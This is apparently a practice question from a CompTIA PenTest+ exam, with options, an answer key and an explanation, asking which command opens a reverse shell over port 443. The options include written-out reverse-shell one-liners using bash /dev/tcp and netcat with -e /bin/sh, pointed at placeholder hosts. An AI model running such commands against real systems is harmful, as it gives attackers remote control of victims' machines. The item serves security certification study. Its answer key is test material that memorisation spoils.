CompTIA PenTest+ (PT0-001) — Question 17

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

Answer options

• A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
• B. ssh superadmin@<DESTINATIONIP> -p 443
• C. nc -e /bin/sh <SOURCEIP> 443
• D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1

Correct answer: D

Explanation

The correct answer is D because it utilizes the bash shell's ability to open a TCP connection to the attacker's machine, enabling a reverse shell. Option A is incorrect as it does not create a reverse shell; it only establishes a socket. Option B is not suitable for a reverse shell, as it is used for SSH access, which requires authentication. Option C uses netcat, but it is less reliable in certain environments compared to the bash TCP method.